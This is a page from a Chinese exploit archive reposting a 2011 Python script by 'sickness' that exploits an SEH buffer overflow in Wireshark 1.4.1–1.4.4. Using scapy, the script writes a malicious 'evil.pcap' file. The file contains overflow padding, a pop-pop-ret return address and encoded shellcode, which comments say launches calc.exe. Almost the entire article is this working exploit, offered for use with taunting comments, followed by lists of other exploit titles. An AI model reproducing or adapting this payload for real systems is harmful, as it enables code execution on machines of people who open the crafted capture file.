首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Wireshark 1.4.1-1.4.4 SEH Overflow Exploit
来源:vfocus.net 作者:sickness 发布时间:2011-04-19  

#!/usr/bin/env python
# Vulnerable app: Wireshark 1.4.1-1.4.4
# Author: sickness
# Download :
# OS: Tested it on Windows XP SP2 and SP3 but it should work on every Windows with DEP off (still working on a ROP exploit)
# DATE   : 17.04.2011
# Fixed in latest version 1.4.5
# DO NOT FORGET TO FEEL THE PWNSAUCE WITH: http://redmine.corelan.be:8800/projects/pvefindaddr
###################################################################
# Offset might change!
# Watch out for other bad chars!!
# Current bad chars: \x00\x0a\x0d\x09
###################################################################
# References:
# https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836
# https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838
###################################################################


import sys
from scapy.all import *

#payload=calc.exe
#ppr is from a non-ASLR enabled wireshark module

evil = Ether(type=0x2323)/("\x41" * 1239 + "\xeb\x06\x90\x90" +  "\x5D\x10\x94\x62" + "\x90" * 16 + "\x33\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x17\x22\xfd\x6a\x83\xee\xfc\xe2\xf4\xeb\xca\x74\x6a\x17\x22\x9d\xe3\xf2\x13\x2f\x0e\x9c\x70\xcd\xe1\x45\x2e\x76\x38\x03\xa9\x8f\x42\x18\x95\xb7\x4c\x26\xdd\xcc\xaa\xbb\x1e\x9c\x16\x15\x0e\xdd\xab\xd8\x2f\xfc\xad\xf5\xd2\xaf\x3d\x9c\x70\xed\xe1\x55\x1e\xfc\xba\x9c\x62\x85\xef\xd7\x56\xb7\x6b\xc7\x72\x76\x22\x0f\xa9\xa5\x4a\x16\xf1\x1e\x56\x5e\xa9\xc9\xe1\x16\xf4\xcc\x95\x26\xe2\x51\xab\xd8\x2f\xfc\xad\x2f\xc2\x88\x9e\x14\x5f\x05\x51\x6a\x06\x88\x88\x4f\xa9\xa5\x4e\x16\xf1\x9b\xe1\x1b\x69\x76\x32\x0b\x23\x2e\xe1\x13\xa9\xfc\xba\x9e\x66\xd9\x4e\x4c\x79\x9c\x33\x4d\x73\x02\x8a\x4f\x7d\xa7\xe1\x05\xc9\x7b\x37\x7d\x23\x70\xef\xae\x22\xfd\x6a\x47\x4a\xcc\xe1\x78\xa5\x02\xbf\xac\xd2\x48\xc8\x41\x4a\x5b\xff\xaa\xbf\x02\xbf\x2b\x24\x81\x60\x97\xd9\x1d\x1f\x12\x99\xba\x79\x65\x4d\x97\x6a\x44\xdd\x28\x09\x76\x4e\x9e\x44\x72\x5a\x98\x6a" + "\x90" * 4500)
wrpcap("evil.pcap",evil)


print "\n"
print "Evil .pcap file created!"
print "It's pwnsauce time!\n"


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Wireshark <= 1.4.4 packet-dect
·FiSH-irssi v0.99 Evil ircd Buf
·Adobe Flash Player < 10.1.53 .
·MS Word Record Parsing Buffer
·IBM Tivoli Directory Server SA
·Adobe Flash Player 10.2.153.1
·Google Chrome 10.0.648.205 Sta
·SimplyPlay v.66 .pls File Buff
·Media Player Classic 6.4.9.1 P
·NEdit 5.5 Format String Vulner
·Windows Media Player 11 .ogg P
·Winamp 5.6.1 .pls Remote Comma
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved